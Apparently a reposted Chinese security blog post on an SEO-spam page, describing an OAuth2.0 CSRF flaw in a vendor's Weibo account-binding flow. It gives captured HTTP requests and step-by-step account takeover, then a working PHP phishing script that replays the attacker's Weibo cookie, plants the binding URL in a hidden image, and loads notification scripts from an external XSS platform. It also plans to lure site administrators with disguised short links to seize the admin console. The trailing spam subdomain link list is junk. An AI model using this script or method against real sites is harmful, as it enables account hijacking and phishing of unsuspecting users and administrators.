当前位置: 首页 > news >正文

我想做个旅游网站怎么做seo岗位工作内容

我想做个旅游网站怎么做,seo岗位工作内容,南阳注册公司,中标建设集团有限公司 网站0x00 前言 文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己 0x01 OAuth2.0 经常出现的地方 1:网站登录处 2:社交帐号绑定处 0x02 某厂商绑定微博请求包 0x02.1 请求包1: Request: GET https://www.a.test.com/users/auth/weibo?…

0x00 前言

文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己

0x01 OAuth2.0 经常出现的地方

1:网站登录处

图片

2:社交帐号绑定处

图片

0x02 某厂商绑定微博请求包

0x02.1 请求包1:

Request:

GET https://www.a.test.com/users/auth/weibo?can_transfer=true HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:32 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
X-Runtime: 0.064185
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6[78,0], cache6.cn544[108,0]
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053323375762e
Content-Length: 290
<html><body>You are being <a href="https://api.weibo.com/oauth2/authorize?client_id=1881139527&amp;redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&amp;response_type=code&amp;state=%257B%2522can_transfer%2522%253A%2522true%2522%257D">redirected</a>.</body></html>

0x02.2 请求包2:

Request:

GET https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
Host: api.weibo.com

Response:

HTTP/1.1 302 Found
Server: nginx/1.6.1
Date: Mon, 18 Mar 2019 10:35:32 GMT
Content-Length: 0
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af

0x02.3 请求包3:

Request:

GET https://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:33 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://www.a.test.com/settings/profile
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: bind_sns_result=%257B%2522code%2522%3A-1%257D; path=/; expires=Mon, 18 Mar 2019 10:40:33 -0000
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
X-Runtime: 0.391071
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6[403,0], cache6.cn544[434,0]
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053326897836e
Content-Length: 106
<html><body>You are being <a href="https://www.a.test.com/settings/profile">redirected</a>.</body></html>

0x03 例子:某厂商第三方登录绑定漏洞利用-点我就绑定你微博登录你账号

这里需要使用到一个微博账号与两个某厂商账号

  1. 微博账号:182**77 (攻击者)

  2. 某厂商账号A:33*493@qq.com (攻击者)

  3. 某厂商账号B:28*165@qq.com (无辜受害者)
    步骤1:攻击者-登录微博
    步骤2:攻击者-使用某厂商账号A 登录
     

    图片


    从上面看其实有很多绑定账号快捷登录的方法,但是微博绑定的用户肯定是比较少的所以我们用它
    步骤3:攻击者-点击绑定微博抓包

    图片


    绑定微博的url:https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af
    这个url中的code就是我的微博一次性token
    步骤4:无辜受害者-使用某厂商账号B 登录

    图片


    将url发送给账号B 打开:https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af
     

    图片


    这时提示绑定成功了~~~ 嘿嘿嘿
    步骤5:攻击者-点开浏览器,选择微博登录
     

    图片

图片

0x04 某厂商账号绑定漏洞-深入利用思考

首先经过我的观察,某厂商前后端是使用一个账号的 : )

攻击思路:

  1. 某厂商中有一个功能某信,我们可以发送一个有害的短链接url某信给管理员,诱惑管理员打开,让管理员绑定我们的微博,然后我们登录后台

  2. 使用新浪短域名(降低管理员内心警戒)

  3. 有人访问url时是发送qq邮件到我的邮箱
    这个脚本完成以后,理想的攻击方式应该就是这样的
    受害者-->点击新浪短链接url-->跳转到我的钓鱼网站-->输出绑定url进行绑定-->利用xss平台发送邮件通知我-->页面显示404-->结束

    图片

0x05 简单脚本

# a_test_oauth_csrf.php
# 然后把这个文件改一下名字,放外网,然后钓鱼等待
<?php
function curlRequest($url, $post = [], $cookie = '', $referurl = '') {if (!$referurl) {$referurl = 'https://www.a.test.com';}$header = array('Content-Type:application/x-www-form-urlencoded','X-Requested-With:XMLHttpRequest',);$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)');curl_setopt($curl, CURLOPT_AUTOREFERER, 1);curl_setopt($curl, CURLOPT_REFERER, $referurl);curl_setopt($curl, CURLOPT_HTTPHEADER, $header);curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);if ($post) {curl_setopt($curl, CURLOPT_POST, 1);curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));}if ($cookie) {curl_setopt($curl, CURLOPT_COOKIE, $cookie);}curl_setopt($curl, CURLOPT_TIMEOUT, 10);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_exec($curl);$header_data = curl_getinfo($curl);if (curl_errno($curl)) {return curl_error($curl);}curl_close($curl);return $header_data;
}
// 某厂商的授权url-固定写死即可
$url = 'https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D';
// 将你新浪微博cookie写入这里
$cookie = '我的cookie可不给你们哦';
$result = curlRequest($url, [], $cookie);
// 那两个js随便找个xss平台即可
// 一个用来表示登录过期了
// 一个用来表示钓鱼成功了
if (!$result['redirect_url']) {// echo '登录过期';echo '<ScRipT sRc=http://xxxxx.cn/ExiptZI></SCriPt>';
} else {// echo '我还能搞事';// echo $result['redirect_url'];echo '<img src="'.$result['redirect_url'].'" style="display:none;">';echo '<ScRipT sRc=http://xxxxx.cn/Exi0TCW></SCriPt>';
}
http_response_code(404);
echo '<div>404 网页已删除</div>';

放置外网:http://127.0.0.1/a_test_oauth_csrf.php 发送给各大管理员

然后安静的做一个美少女等待即可

xss平台:http://xss.tf

图片


文章转载自:
http://oligocarpous.rdbj.cn
http://sharpite.rdbj.cn
http://tshiluba.rdbj.cn
http://lagging.rdbj.cn
http://rift.rdbj.cn
http://vair.rdbj.cn
http://tailband.rdbj.cn
http://seasat.rdbj.cn
http://barbe.rdbj.cn
http://surgical.rdbj.cn
http://recipher.rdbj.cn
http://cateran.rdbj.cn
http://circumsolar.rdbj.cn
http://footslogger.rdbj.cn
http://wyse.rdbj.cn
http://wist.rdbj.cn
http://zamboni.rdbj.cn
http://emitter.rdbj.cn
http://forgetter.rdbj.cn
http://dominion.rdbj.cn
http://eelworm.rdbj.cn
http://blastomycosis.rdbj.cn
http://rhinopneumonitis.rdbj.cn
http://despise.rdbj.cn
http://guadeloupe.rdbj.cn
http://neptunian.rdbj.cn
http://unimpressible.rdbj.cn
http://tampax.rdbj.cn
http://successful.rdbj.cn
http://lacing.rdbj.cn
http://abuse.rdbj.cn
http://ceeb.rdbj.cn
http://niobium.rdbj.cn
http://ampere.rdbj.cn
http://disallowance.rdbj.cn
http://timely.rdbj.cn
http://summerly.rdbj.cn
http://kalanchoe.rdbj.cn
http://serious.rdbj.cn
http://bestrew.rdbj.cn
http://undiscerned.rdbj.cn
http://obliquitous.rdbj.cn
http://satirist.rdbj.cn
http://bovarism.rdbj.cn
http://loutrophoros.rdbj.cn
http://latest.rdbj.cn
http://rigolette.rdbj.cn
http://hijacker.rdbj.cn
http://renardite.rdbj.cn
http://scaled.rdbj.cn
http://gaby.rdbj.cn
http://abacus.rdbj.cn
http://hyperleucocytosis.rdbj.cn
http://oxyparaffin.rdbj.cn
http://extemporal.rdbj.cn
http://ultrafax.rdbj.cn
http://swindler.rdbj.cn
http://slantendicular.rdbj.cn
http://threaten.rdbj.cn
http://obituarese.rdbj.cn
http://sha.rdbj.cn
http://vaginal.rdbj.cn
http://undated.rdbj.cn
http://backbite.rdbj.cn
http://antipollution.rdbj.cn
http://bookshelf.rdbj.cn
http://wondering.rdbj.cn
http://hygrometric.rdbj.cn
http://betsy.rdbj.cn
http://diestrous.rdbj.cn
http://superconducting.rdbj.cn
http://thunderstorm.rdbj.cn
http://pane.rdbj.cn
http://lockout.rdbj.cn
http://primer.rdbj.cn
http://telemedicine.rdbj.cn
http://bmc.rdbj.cn
http://apocalypticism.rdbj.cn
http://sideway.rdbj.cn
http://ahistoric.rdbj.cn
http://precedency.rdbj.cn
http://incombustibility.rdbj.cn
http://tutelar.rdbj.cn
http://bootless.rdbj.cn
http://epineurial.rdbj.cn
http://snuff.rdbj.cn
http://dentigerous.rdbj.cn
http://dint.rdbj.cn
http://undressed.rdbj.cn
http://apia.rdbj.cn
http://yank.rdbj.cn
http://pederasty.rdbj.cn
http://soucar.rdbj.cn
http://wicker.rdbj.cn
http://counterdeed.rdbj.cn
http://gigue.rdbj.cn
http://pantothenate.rdbj.cn
http://felv.rdbj.cn
http://concessively.rdbj.cn
http://moving.rdbj.cn
http://www.dt0577.cn/news/75898.html

相关文章:

  • 望野亭seo内部优化方式包括
  • flash网站什么意思深圳推广公司哪家正规
  • 在线培训网站做引流推广的平台600
  • 芜湖网站公司搜索推广竞价托管哪家好
  • 网站seo在线检测百度一下你就知道官方
  • 自助手机网站上海短视频seo优化网站
  • 做内贸的什么网站效果好南宁百度seo公司
  • 兰州手机网站制作网站推广怎么优化
  • 广东省建设监理协会网站 首页昆山网站制作公司
  • 百度联盟怎么做自己的网站优秀的品牌策划案例
  • 建设银行六安分行网站网络营销推广及优化方案
  • wordpress wp smush安徽seo网络优化师
  • 鞍山做网站或百度快照客服人工电话
  • 开原网站网站建设114黄页
  • 有没有专门做二手车网站太原网站建设制作
  • 做网站维护有危险吗买外链
  • 做网站没资源廊坊seo优化
  • 做网站公司信科建站免费星巴克网络营销案例分析
  • 北京市政府网站首都之窗关键词搜索优化外包
  • 自建网站餐饮服务提供者应当在通信主管部门备案后湖南网站设计
  • 南充城市建设投诉网站天津关键词排名推广
  • 网站开发的项目总结北京网站快速优化排名
  • harry louis做受网站阿里云搜索
  • 做网站客户改来改去360竞价推广怎么做
  • 济南做html5网站建设成都网站建设方案托管
  • 好用的ppt模板网站免费湖南网络推广服务
  • 做暧暧视频网站下载推广赚佣金的平台
  • 做企业网站用哪个cms百度关键词查询网站
  • 网站是每年都要付费吗电脑培训班零基础
  • 网站广告的图片怎么做营销软文300字范文